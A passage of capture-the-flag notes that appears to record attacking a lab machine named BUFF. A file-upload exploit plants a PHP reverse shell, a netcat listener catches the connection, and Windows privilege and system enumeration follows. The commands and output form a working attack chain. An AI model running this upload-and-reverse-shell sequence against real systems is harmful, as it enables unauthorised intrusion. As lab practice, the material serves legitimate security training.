3 :80
Using https://github.com/ssMMiles/gym-management-unrestricted-upload
$ cp /opt/php-reverse-shell/src/php_reverse_shell.php shell.php
$ python exploit.py -t 10.10.10.198:8080 -f shell.php
Uploading shell.php to 10.10.10.198:8080/up.php...
You can now access this file at http://10.10.10.198:8080/shell.php !
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
buff\shaun
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
systeminfo
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
System Type: x64-based PC
Hotfix(s): N/A